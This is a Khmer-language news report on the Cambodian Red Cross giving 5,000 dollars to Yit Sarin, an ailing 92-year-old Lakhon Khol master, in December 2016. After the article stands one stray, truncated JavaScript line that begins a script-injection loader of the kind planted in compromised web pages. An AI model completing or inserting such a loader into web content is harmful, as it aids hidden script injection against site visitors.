ព្រឹតិ្តការណ៍ថ្មីៗ

ព្រឹទ្ធាចារ្យផ្នែកល្ខោនខោលកំពុងមានជំងឺធ្ងន់ធ្ងរ មានភាពកក់ក្តៅ្កក្រោយទទួលការឧបត្ថម្ភជាលើកទី ២ ពីសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន

2 ឆ្នាំ មុន 0 តូ សុផល

សៀមរាប៖ ដោយសន្តានចិត្តអាណិតអាសូរចំពោះវីរៈសិល្បៈករជើងចាស់ លោកតាព្រឹទ្ធាចារ្យ យិត សារិន (ហៅ ស ឬស្វាស) ដែលកំពុងមានជំងឺរលាកថ្លើមធ្ងន់ធ្ងរនោះ នៅព្រឹកថ្ងៃទី ២០ ខែធ្នូ ឆ្នាំ២០១៦ នេះ សម្ដេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ប្រធានកាកបាទក្រហមកម្ពុជា បានចាត់ឱ្យក្រុមការងារសាខាកាកបាទក្រហមកម្ពុជា ខេត្តសៀមរាប នាំយកថវិកាចំនួន ៥,០០០ដុល្លារអាមេរិក (ប្រាំពាន់ដុល្លារអាមេរិក) ប្រគល់ជូនផ្ទាល់ដៃ លោកតាព្រឹទ្ធាចារ្យ និងលោក សារិន វឌ្ឍនៈ ជាកូនប្រុសបង្កើត នៅទីស្នាក់ការសាខាកាកបាទក្រហមកម្ពុជា ខេត្តសៀមរាប ខណៈពេលកំពុងធ្វើដំណើរពីភ្នំពេញទៅព្យាបាលជំងឺនៅមន្ទីរពេទ្យសុរិន្ទ ប្រទេសថៃ។ សូមបញ្ជាក់ថា កាលពីថ្ងៃទី ១៨ ខែកក្កដា ឆ្នាំ ២០១៦ កន្លងទៅ កាកបាទក្រហមកម្ពុជា បានឧបត្ថម្ភថវិកា ៥លានរៀល ជូន លោកតាព្រឹទ្ធាចារ្យ យិត សារិន ម្តងរួចមកហើយ។

លោកតាព្រឹទ្ធាចារ្យ យិត សារិន (ហៅ ស ឬស្វាស) មានអាយុ៩២ឆ្នាំ ជាគ្រូសិល្បៈផ្នែកល្ខោនខោល ដែលបានលះបង់កម្លាំងកាយ-ចិត្ត ផ្តល់ចំណេះដឹងសិល្បៈ ផ្នែកល្ខោនខោល ជូនដល់កុលបុត្រកុលធីតាខ្មែរជំនាន់ក្រោយ។ បន្ថែមពីនេះ លោកតាព្រឹទ្ធាចារ្យ មានឯកទេសសំដែងតួ “ស្វា” ធ្លាប់រាំសំដែងនៅក្នុងព្រះបរមរាជវាំង នាសម័យសង្គមរាស្ត្រនិយម ក្នុងរជ្ជកាលព្រះមហាក្សត្រីយានី ស៊ីសុវត្ថិកុសុមៈនារីរ័ត្ន សិរីវឌ្ឍនា ហើយក៏ជាអតីតគ្រូបង្ហាត់សិល្បៈផ្នែកល្ខោនខោលនៅក្នុងព្រះបរមរាជវាំង និងសាលាមធ្យមវិចិត្រសិល្បៈទៀតផង៕

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!